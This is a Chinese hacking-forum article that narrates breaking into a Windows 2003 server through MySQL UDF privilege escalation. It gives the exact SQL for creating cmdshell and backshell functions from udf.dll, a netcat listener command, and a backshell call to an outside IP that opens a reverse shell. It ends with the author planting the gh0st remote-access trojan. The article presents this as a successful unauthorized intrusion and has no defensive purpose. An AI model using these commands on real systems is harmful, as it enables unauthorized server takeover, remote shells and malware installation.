热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Root提权 UDF另类提权成功拿下服务器

发布时间:2010-05-20 09:11文章来源:网络文章作者:子仪 点击次数:
摘要:拿SHELL的过程就不说了,好,开始提权。 简单搜集下服务器信息:WIN2003,IIS6,只支持PHP脚本,权限比较小,CMDSHELL无法执行。扫了下端口,开了80和3306。既然开了MYSQL,那就找ROOT,UDF提权。 郁闷的是找遍了所有网站也找不到ROOT,只有一个CCES的用户,...

拿SHELL的过程就不说了,好,开始提权

简单搜集下服务器信息:WIN2003,IIS6,只支持PHP脚本,权限比较小,CMDSHELL无法执行。扫了下端口,开了80和3306。既然开了MYSQL,那就找ROOT,UDF提权。

郁闷的是找遍了所有网站也找不到ROOT,只有一个CCES的用户,测试下是否为ROOT。用这个CCES来连接MYSQL,提示连接成功,哈哈,果然是ROOT。


 

接着上传个UDF提权SHELL,填入用户名密码和数据库,连接。然后到处个UDF.DLL到系统目录下,导入成功后在SQL命令下输入create function cmdshell returns string soname 'udf.dll',创建一个CMDSHELL的函数。接下来就可以执行系统命令。


可是当我执行select cmdshell('net user'),却什么都没有返回,执行其他的命令也是如此。太让我失望了,难道UDF.dll被杀了,用SHELL查看了却下还在。那就是CMDSHELL不能用了。唉,思路一度陷入僵局。。。。。


这时想到UDF除了可以创建CMDSHELL外,还可以创建其他函数,如downloader下载者,open3389 通用开3389终端服务,backshell 反弹Shell等等。继续在SQL命令下输入create function backshell returnsstring soname 'udf.dll'。提示创建成功。然后在本地执行nc -l -p 99,监听99端口。

 

这时只要通过backshell反弹个SHELL到我IP上的99端口就可以了,输入select backshell('114.228.34.56',99),提示执行成功。

 



这时服务器的CMDSHELL成功反弹到我本机。CMDSHELL的权限是最高的,这下就好办了。我试着开服务器的3389,可是管理员把注册表禁用了(管理员真TMD变态!!)。既然这样,我也不浪费时间了,直接传gh0st马,运行,不到5秒钟,可爱的服务器就上线了。还不错的配置,OK,收工。

 

 

标签分类: 入侵提权 脚本渗透 服务器入侵

上一篇:phpbb3 后台拿shell
下一篇:揭开黑客工具神秘的面纱--分析阿D注入工具